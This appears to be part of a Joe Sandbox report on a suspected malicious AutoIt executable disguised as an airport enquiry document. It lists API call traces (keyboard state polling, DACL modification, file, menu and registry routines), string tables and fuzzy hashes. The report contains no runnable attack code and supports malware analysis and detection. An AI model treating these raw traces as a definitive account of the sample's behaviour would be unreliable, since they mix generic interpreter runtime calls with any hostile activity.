              • Part of subcall function 00D0ADF1: PtInRect.USER32(?,?,00D0C304), ref: 00D0AEA0
            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D0C980
            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D0C98B
            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D0C9AE
            • _wcscat.LIBCMT ref: 00D0C9DE
            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00D0C9F5
            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D0CA0E
            • SendMessageW.USER32(?,000000B1,?,?), ref: 00D0CA25
            • SendMessageW.USER32(?,000000B1,?,?), ref: 00D0CA47
            • DragFinish.SHELL32(?), ref: 00D0CA4E
            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00D0CB41
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
            • API String ID: 169749273-3440237614
            • Opcode ID: 4c8292dc7d505b179cf8001291ff34a4fa6e2c433e1b3fcfbf0cb9d781fa6def
            • Instruction ID: 1999bf237a5a54f3b10c4b884bbd53b0f78c25db142a37546bd27969d0c64e9e
            • Opcode Fuzzy Hash: 4c8292dc7d505b179cf8001291ff34a4fa6e2c433e1b3fcfbf0cb9d781fa6def
            • Instruction Fuzzy Hash: CC618E71108301AFC710EF54DC85EAFBBE8EF89714F500A1EF596922A1DB70DA09DB66
            APIs
            • CharUpperBuffW.USER32(?,?), ref: 00D046AB
            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D046F6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharMessageSendUpper
            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
            • API String ID: 3974292440-4258414348
            • Opcode ID: 0470576f5f5915b9de11b707407b169ff54545fc0c7cd85e5b8276457bc75449
            • Instruction ID: 8dfcfa819ffe8794f65805b553a9d0ec22283bf55fc1918bc6b154cb7ce298fc
            • Opcode Fuzzy Hash: 0470576f5f5915b9de11b707407b169ff54545fc0c7cd85e5b8276457bc75449
            • Instruction Fuzzy Hash: C291A1B46043019FCB14EF10C491B6EB7A1EF85358F14886DF99A5B3A2DB31ED06EB91
            APIs
            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00D0BB6E
            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00D06D80,?), ref: 00D0BBCA
            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D0BC03
            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00D0BC46
            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D0BC7D
            • FreeLibrary.KERNEL32(?), ref: 00D0BC89
            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D0BC99
            • DestroyIcon.USER32(?), ref: 00D0BCA8
            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D0BCC5
            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00D0BCD1
              • Part of subcall function 00CA313D: __wcsicmp_l.LIBCMT ref: 00CA31C6
            Strings
            Similarity
            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
            • String ID: .dll$.exe$.icl
            • API String ID: 1212759294-1154884017
            • Opcode ID: af1f56bc62edebca39e318c590a02923e614b37b6ce3e4a9c5a6bf65edeee45d
            • Instruction ID: 71d1a211d4b17bb25b870e1eee4184cd7fa901bd3ac6aecb49bff29b0c6705d3
            • Opcode Fuzzy Hash: af1f56bc62edebca39e318c590a02923e614b37b6ce3e4a9c5a6bf65edeee45d
            • Instruction Fuzzy Hash: 2B61BE71504319BEEB24DF74CC85BBE77A8EB08721F20451AF919D62D0DBB4A990DBB0
            APIs
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • CharLowerBuffW.USER32(?,?), ref: 00CEA636
            • GetDriveTypeW.KERNEL32 ref: 00CEA683
            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CEA6CB
            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CEA702
            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CEA730
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            Strings
            Similarity
            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
            • API String ID: 2698844021-4113822522
            • Opcode ID: 7887af355c504dc86a9bdc508edc0c9835cd96e912799dae1e73119988c25abb
            • Instruction ID: 652f133409d99356ac92a329d300a7f969ee7672ec9b32c65631f87d0cd6fb6b
            • Opcode Fuzzy Hash: 7887af355c504dc86a9bdc508edc0c9835cd96e912799dae1e73119988c25abb
            • Instruction Fuzzy Hash: 3751AD711047059FC700EF25C88196AB7F8FF98718F14496DF89A972A1DB31EE0ADB52
            APIs
            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CEA47A
            • __swprintf.LIBCMT ref: 00CEA49C
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CEA4D9
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CEA4FE
            • _memset.LIBCMT ref: 00CEA51D
            • _wcsncpy.LIBCMT ref: 00CEA559
            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CEA58E
            • CloseHandle.KERNEL32(00000000), ref: 00CEA599
            • RemoveDirectoryW.KERNEL32(?), ref: 00CEA5A2
            • CloseHandle.KERNEL32(00000000), ref: 00CEA5AC
            Strings
            Similarity
            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
            • String ID: :$\$\??\%s
            • API String ID: 2733774712-3457252023
            • Opcode ID: fe3e6b3c1812e66bf80834a4be88ac81936eb28adb29aed185960ef6a5159fca
            • Instruction ID: 4bd2c4ab5edba832c1a5fbb782895364bdbb1500bc580df8cd2e0f8923cbe5e0
            • Opcode Fuzzy Hash: fe3e6b3c1812e66bf80834a4be88ac81936eb28adb29aed185960ef6a5159fca
            • Instruction Fuzzy Hash: FD31B2B150024AABDB21DFA1DC49FEB77BCEF89701F2041B6F918D2160E770A7448B25
            APIs
            Similarity
            • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
            • String ID:
            • API String ID: 884005220-0
            • Opcode ID: b15437ff353952f5125ce631e8600e032479e36635af21443fc4dc8fc742af3d
            • Instruction ID: 8200ca39db0e0f733cdf7ac41fd4275de657604016b8dc7b8391bcf6789c664f
            • Opcode Fuzzy Hash: b15437ff353952f5125ce631e8600e032479e36635af21443fc4dc8fc742af3d
            • Instruction Fuzzy Hash: 76610872900316AFDB209F74DC42BE97BA5EF12325F104119E8A1DB2D1DB35DE80D7A2
            APIs
            • __wsplitpath.LIBCMT ref: 00CEDC7B
            • _wcscat.LIBCMT ref: 00CEDC93
            • _wcscat.LIBCMT ref: 00CEDCA5
            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CEDCBA
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEDCCE
            • GetFileAttributesW.KERNEL32(?), ref: 00CEDCE6
            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CEDD00
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEDD12
            Strings
            Similarity
            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
            • String ID: *.*
            • API String ID: 34673085-438819550
            • Opcode ID: 59cbe47c283e2c1d067cc1b02c9ac0e466baf33d270572800904211405b45ea2
            • Instruction ID: c4c645396d57d544213c5d9010512c9a7e369172976db8537f06cb3264f40f99
            • Opcode Fuzzy Hash: 59cbe47c283e2c1d067cc1b02c9ac0e466baf33d270572800904211405b45ea2
            • Instruction Fuzzy Hash: 6681A4715043819FCB24EF26C8459AEB7E8BF88354F19882EF89AC7250E770DA45DB52
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D0C4EC
            • GetFocus.USER32 ref: 00D0C4FC
            • GetDlgCtrlID.USER32(00000000), ref: 00D0C507
            • _memset.LIBCMT ref: 00D0C632
            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00D0C65D
            • GetMenuItemCount.USER32(?), ref: 00D0C67D
            • GetMenuItemID.USER32(?,00000000), ref: 00D0C690
            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00D0C6C4
            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00D0C70C
            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D0C744
            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00D0C779
            Strings
            Similarity
            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
            • String ID: 0
            • API String ID: 1296962147-4108050209
            • Opcode ID: 3402393c6fde5cd27afca61a9c871454546a2ce35757df36a4370082970307d8
            • Instruction ID: feab0232472787e312d15163cda7e8f914924d2b4116e3e72c78db74c213182d
            • Opcode Fuzzy Hash: 3402393c6fde5cd27afca61a9c871454546a2ce35757df36a4370082970307d8
            • Instruction Fuzzy Hash: 16817D746183019FD720DF14C884BABBBE8FB89314F14162DF999972A1D771D905CBB2
            APIs
              • Part of subcall function 00CD874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD8766
              • Part of subcall function 00CD874A: GetLastError.KERNEL32(?,00CD822A,?,?,?), ref: 00CD8770
              • Part of subcall function 00CD874A: GetProcessHeap.KERNEL32(00000008,?,?,00CD822A,?,?,?), ref: 00CD877F
              • Part of subcall function 00CD874A: HeapAlloc.KERNEL32(00000000,?,00CD822A,?,?,?), ref: 00CD8786
              • Part of subcall function 00CD874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD879D
              • Part of subcall function 00CD87E7: GetProcessHeap.KERNEL32(00000008,00CD8240,00000000,00000000,?,00CD8240,?), ref: 00CD87F3
              • Part of subcall function 00CD87E7: HeapAlloc.KERNEL32(00000000,?,00CD8240,?), ref: 00CD87FA
              • Part of subcall function 00CD87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CD8240,?), ref: 00CD880B
            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CD8458
            • _memset.LIBCMT ref: 00CD846D
            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CD848C
            • GetLengthSid.ADVAPI32(?), ref: 00CD849D
            • GetAce.ADVAPI32(?,00000000,?), ref: 00CD84DA
            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CD84F6
            • GetLengthSid.ADVAPI32(?), ref: 00CD8513
            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CD8522
            • HeapAlloc.KERNEL32(00000000), ref: 00CD8529
            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CD854A
            • CopySid.ADVAPI32(00000000), ref: 00CD8551
            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CD8582
            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CD85A8
            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CD85BC
            Similarity
            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
            • String ID:
            • API String ID: 3996160137-0
            • Opcode ID: 02f17bf04e1475007faddca5403f6c48a9de2a47e375616d76d038532d18df56
            • Instruction ID: b6269ea2e9b8d9527143648c706a4b6923a1c055e45539c211298c6ba3ef4d14
            • Opcode Fuzzy Hash: 02f17bf04e1475007faddca5403f6c48a9de2a47e375616d76d038532d18df56
            • Instruction Fuzzy Hash: 29612C71900209ABDF10DF95EC45AAEBBB9FF04710F14816AF925E7391EB319A09CF60
            APIs
            • GetDC.USER32(00000000), ref: 00CF76A2
            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CF76AE
            • CreateCompatibleDC.GDI32(?), ref: 00CF76BA
            • SelectObject.GDI32(00000000,?), ref: 00CF76C7
            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CF771B
            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00CF7757
            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CF777B
            • SelectObject.GDI32(00000006,?), ref: 00CF7783
            • DeleteObject.GDI32(?), ref: 00CF778C
            • DeleteDC.GDI32(00000006), ref: 00CF7793
            • ReleaseDC.USER32(00000000,?), ref: 00CF779E
            Strings
            Similarity
            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
            • String ID: (
            • API String ID: 2598888154-3887548279
            • Opcode ID: 07e57087bd98bcf06aa150fd5148368b8f86e0a2ce4b570474ef2d0c2e38f2a2
            • Instruction ID: ad34c86c932f71f8cd4ad9fbbf1da2b04d43911480d5dca2abaec98e3ba27e07
            • Opcode Fuzzy Hash: 07e57087bd98bcf06aa150fd5148368b8f86e0a2ce4b570474ef2d0c2e38f2a2
            • Instruction Fuzzy Hash: 71513875904309EFCB25CFA8CC85EAEBBB9EF48310F14852DFA59D7210D731A9408B60
            APIs
            • LoadStringW.USER32(00000066,?,00000FFF,00D0FB78), ref: 00CEA0FC
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            • LoadStringW.USER32(?,?,00000FFF,?), ref: 00CEA11E
            • __swprintf.LIBCMT ref: 00CEA177
            • __swprintf.LIBCMT ref: 00CEA190
            • _wprintf.LIBCMT ref: 00CEA246
            • _wprintf.LIBCMT ref: 00CEA264
            Strings
            Similarity
            • API ID: LoadString__swprintf_wprintf$_memmove
            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
            • API String ID: 311963372-2391861430
            • Opcode ID: eb1c3e81711ac544271f2057d8c8f8365068b359452f86bc31c8bbfb947d60d5
            • Instruction ID: c013cc33843c3d730b1433cc8b62d5b8b7f7ec7bf0bc149bcf6b7ad1f5f4ccf2
            • Opcode Fuzzy Hash: eb1c3e81711ac544271f2057d8c8f8365068b359452f86bc31c8bbfb947d60d5
            • Instruction Fuzzy Hash: 8E514871904209BFCF15FBE0CD86AEEB778AF05304F200265B515B21A1EB71AF58EB65
            APIs
              • Part of subcall function 00CA0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C86C6C,?,00008000), ref: 00CA0BB7
              • Part of subcall function 00C848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C848A1,?,?,00C837C0,?), ref: 00C848CE
            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C86D0D
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C86E5A
              • Part of subcall function 00C859CD: _wcscpy.LIBCMT ref: 00C85A05
              • Part of subcall function 00CA387D: _iswctype.LIBCMT ref: 00CA3885
            Strings
            Similarity
            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
            • API String ID: 537147316-1018226102
            • Opcode ID: 8fd063b2e9be72730d52e907aab7947397bcd124c9b27617c213876329cafa5a
            • Instruction ID: 15e19405ae44450a532e9bd0f934b8ade80084c97d2c900e59e86b1f94f3cc20
            • Opcode Fuzzy Hash: 8fd063b2e9be72730d52e907aab7947397bcd124c9b27617c213876329cafa5a
            • Instruction Fuzzy Hash: D002BD301083419FC724EF24C881AEFBBE5BF89758F14091DF49A972A1DB70DA49EB56
            APIs
            • _memset.LIBCMT ref: 00C845F9
            • GetMenuItemCount.USER32(00D46890), ref: 00CBD7CD
            • GetMenuItemCount.USER32(00D46890), ref: 00CBD87D
            • GetCursorPos.USER32(?), ref: 00CBD8C1
            • SetForegroundWindow.USER32(00000000), ref: 00CBD8CA
            • TrackPopupMenuEx.USER32(00D46890,00000000,?,00000000,00000000,00000000), ref: 00CBD8DD
            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00CBD8E9
            Similarity
            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
            • String ID:
            • API String ID: 2751501086-0
            • Opcode ID: faa4d38186f181d3bba3674cedb9b63ddf950ba22dfe302231713498072391b6
            • Instruction ID: b193fe8efb9f03dd9ea13e57589ba745733ae50d6644df60f473e1a08685dedb
            • Opcode Fuzzy Hash: faa4d38186f181d3bba3674cedb9b63ddf950ba22dfe302231713498072391b6
            • Instruction Fuzzy Hash: 2C710570600216BEEB349F15DC89FEABF69FF05368F200216F52AA61E0DBB15910DB94
            APIs
            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D00038,?,?), ref: 00D010BC
            Strings
            Similarity
            • API ID: BuffCharUpper
            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
            • API String ID: 3964851224-909552448
            • Opcode ID: 3aa733fa231bebc739fc7ecbcc76b9593943b0b23a4ecf1242d374335f57aac4
            • Instruction ID: 35dcbe253db9a6179e05d24e130cde9d20b5858cf19b529559793799c8e7f433
            • Opcode Fuzzy Hash: 3aa733fa231bebc739fc7ecbcc76b9593943b0b23a4ecf1242d374335f57aac4
            • Instruction Fuzzy Hash: 8341687550034A8BCF14EFA0D891BEE3724BF26354F244415EDA55B292DB30E91ADBB1
            APIs
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
              • Part of subcall function 00C87A84: _memmove.LIBCMT ref: 00C87B0D
            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CE55D2
            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CE55E8
            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CE55F9
            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CE560B
            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CE561C
            Strings
            Similarity
            • API ID: SendString$_memmove
            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
            • API String ID: 2279737902-1007645807
            • Opcode ID: cfe4bee48e5f8c3930f1af19ce2053d16cf36a36427834afaa9db597e484382c
            • Instruction ID: 8ee2dddbd7d88b3e96e953aa3c5a4ed9938b5e67187a8d5e10c040f232e3de2e
            • Opcode Fuzzy Hash: cfe4bee48e5f8c3930f1af19ce2053d16cf36a36427834afaa9db597e484382c
            • Instruction Fuzzy Hash: EF11C4216501697DD720B7A6CC8ADFF7B7CEF91F08F500529B455A20D1EEA05E09CAB1
            APIs
            Strings
            Similarity
            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
            • String ID: 0.0.0.0
            • API String ID: 208665112-3771769585
            • Opcode ID: 5ef01de0af7e3863347687ff264c51777fb5afa6324e3541a667645b2f1b996e
            • Instruction ID: 465ae345d0cc8d60c88c98b355ed76d5e1d50ca3c6e9aa0e65a86dfe6cbf2ceb
            • Opcode Fuzzy Hash: 5ef01de0af7e3863347687ff264c51777fb5afa6324e3541a667645b2f1b996e
            • Instruction Fuzzy Hash: 7A112731904225AFCB34EB65DC0AFDB77BCDF41714F1401B5F408E6192EF709A819661
            APIs
            • timeGetTime.WINMM ref: 00CE521C
              • Part of subcall function 00CA0719: timeGetTime.WINMM(?,75C0B400,00C90FF9), ref: 00CA071D
            • Sleep.KERNEL32(0000000A), ref: 00CE5248
            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00CE526C
            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CE528E
            • SetActiveWindow.USER32 ref: 00CE52AD
            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CE52BB
            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CE52DA
            • Sleep.KERNEL32(000000FA), ref: 00CE52E5
            • IsWindow.USER32 ref: 00CE52F1
            • EndDialog.USER32(00000000), ref: 00CE5302
            Strings
            Similarity
            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
            • String ID: BUTTON
            • API String ID: 1194449130-3405671355
            • Opcode ID: adff04a3f39f7a9e95bb21e54d7eea323692d0e4e95ef060e821ccd6a29a0567
            • Instruction ID: d5d40c2dbce962bec99c6c58b0bd1057cfc33eb9d86a308893ed38191736f198
            • Opcode Fuzzy Hash: adff04a3f39f7a9e95bb21e54d7eea323692d0e4e95ef060e821ccd6a29a0567
            • Instruction Fuzzy Hash: 1A21C374204B85AFE7205F31EC8CB2A3B69EB5638AF601434F105C67B1CBB19D409BB2
            APIs
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • CoInitialize.OLE32(00000000), ref: 00CED855
            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CED8E8
            • SHGetDesktopFolder.SHELL32(?), ref: 00CED8FC
            • CoCreateInstance.OLE32(00D12D7C,00000000,00000001,00D3A89C,?), ref: 00CED948
            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CED9B7
            • CoTaskMemFree.OLE32(?,?), ref: 00CEDA0F
            • _memset.LIBCMT ref: 00CEDA4C
            • SHBrowseForFolderW.SHELL32(?), ref: 00CEDA88
            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CEDAAB
            • CoTaskMemFree.OLE32(00000000), ref: 00CEDAB2
            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00CEDAE9
            • CoUninitialize.OLE32(00000001,00000000), ref: 00CEDAEB
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
            • String ID:
            • API String ID: 1246142700-0
            • Opcode ID: 1f530662af0b295f28c4de4fbcdb547524ccccf2aabe0cdda696faa7ecf7eb36
            • Instruction ID: 8680421db722bc31f55f70733af3d4261f8ecefbb538e8cd4871896e631a9fdf
            • Opcode Fuzzy Hash: 1f530662af0b295f28c4de4fbcdb547524ccccf2aabe0cdda696faa7ecf7eb36
            • Instruction Fuzzy Hash: BCB1F075A00109AFDB14DF65C888EAEBBF9FF48304B148469F90ADB251DB30EE45DB54
            APIs
            • GetKeyboardState.USER32(?), ref: 00CE05A7
            • SetKeyboardState.USER32(?), ref: 00CE0612
            • GetAsyncKeyState.USER32(000000A0), ref: 00CE0632
            • GetKeyState.USER32(000000A0), ref: 00CE0649
            • GetAsyncKeyState.USER32(000000A1), ref: 00CE0678
            • GetKeyState.USER32(000000A1), ref: 00CE0689
            • GetAsyncKeyState.USER32(00000011), ref: 00CE06B5
            • GetKeyState.USER32(00000011), ref: 00CE06C3
            • GetAsyncKeyState.USER32(00000012), ref: 00CE06EC
            • GetKeyState.USER32(00000012), ref: 00CE06FA
            • GetAsyncKeyState.USER32(0000005B), ref: 00CE0723
            • GetKeyState.USER32(0000005B), ref: 00CE0731
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: State$Async$Keyboard
            • String ID:
            • API String ID: 541375521-0
            • Opcode ID: ba4ddb60caa89161314f57c7fc2fa1de1a60566616eb3fa18a0787c0c83502dd
            • Instruction ID: a4b339371a7391254e3c0e95d0378f2b3e8680aac3b65121cc17973693136923
            • Opcode Fuzzy Hash: ba4ddb60caa89161314f57c7fc2fa1de1a60566616eb3fa18a0787c0c83502dd
            • Instruction Fuzzy Hash: 65510A30A047C819FB34DBA288547EABFB49F01380F184599D9D2561C2DAE49BCCCBA5
            APIs
            • GetDlgItem.USER32(?,00000001), ref: 00CDC746
            • GetWindowRect.USER32(00000000,?), ref: 00CDC758
            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00CDC7B6
            • GetDlgItem.USER32(?,00000002), ref: 00CDC7C1
            • GetWindowRect.USER32(00000000,?), ref: 00CDC7D3
            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00CDC827
            • GetDlgItem.USER32(?,000003E9), ref: 00CDC835
            • GetWindowRect.USER32(00000000,?), ref: 00CDC846
            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00CDC889
            • GetDlgItem.USER32(?,000003EA), ref: 00CDC897
            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CDC8B4
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00CDC8C1
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$ItemMoveRect$Invalidate
            • String ID:
            • API String ID: 3096461208-0
            • Opcode ID: 632cbfce981ad8ad7651e0972ad3a4017c0d9dc0fdab1147730069e77aee4c4f
            • Instruction ID: f84ce5f40721752c3e378609d716d03534e469dda14017423d61a0f08fa9d167
            • Opcode Fuzzy Hash: 632cbfce981ad8ad7651e0972ad3a4017c0d9dc0fdab1147730069e77aee4c4f
            • Instruction Fuzzy Hash: 58512171B00205ABDB18CF69DD85BAEBBBAEB88310F24812DF619D7390D7709E00CB50
            APIs
